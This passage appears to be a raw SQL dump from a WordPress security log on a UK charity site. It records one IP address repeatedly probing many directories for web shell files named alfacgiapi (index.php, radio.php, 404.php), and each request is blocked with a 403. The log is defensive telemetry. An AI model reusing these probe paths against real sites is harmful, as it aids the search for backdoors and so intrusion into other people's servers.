AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','g6MVA1pODf8aZdK5wN9EGCIi',0,1674462204.3221,97,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','T1jEPnadiLoCMyH4RFkKSBhw',0,1674462208.5729,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PGWi0deomDFKYQb3laE4ZwJA',0,1674462208.9255,85,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','yrqNSwMczQvoX6HDfUkGlVi4',0,1674462209.2711,151,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Rmu7NSBVZ4qyb5fascUClLWK',0,1674462212.4065,87,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lG8CzU2ndygLqiXOQW6bjVae',0,1674462212.7419,115,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','LT3CjohZNB1igQ9xX60OJUAF',0,1674462213.1482,108,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','TfCiyJwc3veGEKaFPROrN95W',0,1674462216.8426,115,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','GiIbSvHLMXCJ0aK6xh3Zm4Pf',0,1674462217.2525,84,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kljFc7dGhOPY6DUutHpZiB2A',0,1674462217.5324,134,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','6MmiqT0g7V8ySY513H9BoWGN',0,1674462222.6727,123,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DUE9Tnovk86ywGgMSRau0jit',0,1674462223.0040,87,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0w5aSFCPrX7ueq3v9BoImzdW',0,1674462223.2813,88,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','y3ogz4RpOdb9B1CrmvZhL257',0,1674462229.1650,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','FWiJ4Oh1aSvl7XQnHpsjtLUg',0,1674462229.5654,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','5UVHmXqnKevQR3WDN69zfYAC',0,1674462229.8938,85,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','d7RluPafm0VKpyeLTZ6EY8G4',0,1674462238.2508,91,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','iKTgmqYzJ9WtZ2Q7dBuF0IaL',0,1674462238.5989,87,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/acme-challenge/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','4NlzUDWxjncRb9C6HVqw1mQs',0,1674462238.8841,122,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','x0WHIYSldMFQftL82i6vkXjb',0,1674462243.8785,107,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DMro1OwZLAd3TIaeBkRvX0Yh',0,1674462244.3010,121,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','VGnQE2f5bpuwilNzvDm0x4M9',0,1674462244.6689,104,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pbFirYNyL14BEsSnAHcwdG6J',0,1674462248.5366,130,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','zmWEUkxRIeCoBG2Pa4XwKD03',0,1674462248.9473,119,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.well-known/pki-validation/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','7kWzyUXGwKSfhTRNIm9LAJ3j',0,1674462249.2820,98,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','oVtLv1O4pbQyqP3ZMkI7wKYg',0,1674462253.9707,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9rb0kFfLe68whKIOxDNRPjmV',0,1674462254.2755,117,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','xsnQE3PfCwDtlNikYbST4zAv',0,1674462254.5943,132,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Jw7kocy5MKWBTxqpLHgE2tzU',0,1674462258.3565,92,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','FSXtVu2lp6njbqrKkfeLaYJx',0,1674462258.6987,112,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.tmb/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SZ0Q9z4JWlxK1XMeYETypdvN',0,1674462259.0203,87,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','t10xMRD9mwYkyFdTHKJzquCn',0,1674462261.7148,126,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','w7N2qdGZxyte3BSmXb8vV5IQ',0,1674462262.0395,95,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wkFfVcivlZJX9KNUzesPO6j5',0,1674462262.3671,94,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','goIYOTQwakPxKjGMJdr8WS2H',0,1674462266.7806,132,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','y1f0DwRuY63OMCJIHlBj79A4',0,1674462267.1438,101,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MGKqy6NHvEz089POCUXdDojB',0,1674462267.4580,148,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NdsREUpqvrc3itG8fBPKOMYm',0,1674462270.7861,116,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Y9MNFckPv4s0ARr5tyEdqLmV',0,1674462271.1092,159,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','spjozqLCM8emg60InAhk19Xa',0,1674462271.5604,132,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','19VaKA2SubkqDW6ezgiQFvTw',0,1674462277.2963,86,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','hma2qtKfBZbej37IOdGR0TPv',0,1674462277.6209,130,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','UlAqLf1thpePGn05SruK8ZsV',0,1674462277.9498,125,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','twhsjm5Qckoiv3xLyVbJMfng',0,1674462282.8489,113,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YbpZXfVruhm9l3TNS8KHeRio',0,1674462283.2275,88,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','smhpEXwKzAqJHPnC0NakTybx',0,1674462283.5257,96,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','iMH0dypFSAxBuPKYtz63GWDC',0,1674462286.5719,125,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pwSqO3rx0RA7IzJWHZhcdsVv',0,1674462286.9115,110,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SfLx0Ktp5uI6ewsmAURDP3YF',0,1674462287.2924,111,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','sVmAH9pbTY06M57gw13rneBu',0,1674462292.6275,90,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','nWobC97mZfr3YEQJBxRUPNpq',0,1674462292.9278,155,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','lk8IAryuS2vHxQ4C9zVW6gNm',0,1674462293.2845,108,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8yjPI5Q93xcFdflh0DX6KbnE',0,1674462298.7287,102,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','JshW4YiTVkoatSn7F2IL3w6E',0,1674462299.0436,135,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/components/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ALG1pNyluOeZIFRzBf2H5PqW',0,1674462299.4581,130,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SAJzGCy1IWcY7M6B9w4jHe0o',0,1674462305.5050,142,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','E0tdoMbO1A75rscKYJzLjuVa',0,1674462305.8768,103,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','hN8FzKLZ62WgPSqIdlQw9CVx',0,1674462306.1755,113,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0QuUh4yTgXe1Oox8rRaZ97Fp',0,1674462310.0954,105,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','YKZeuojrfXOSy86qaCBxMlsI',0,1674462310.3832,109,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.equalitywalk.org.uk/wordpress/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile 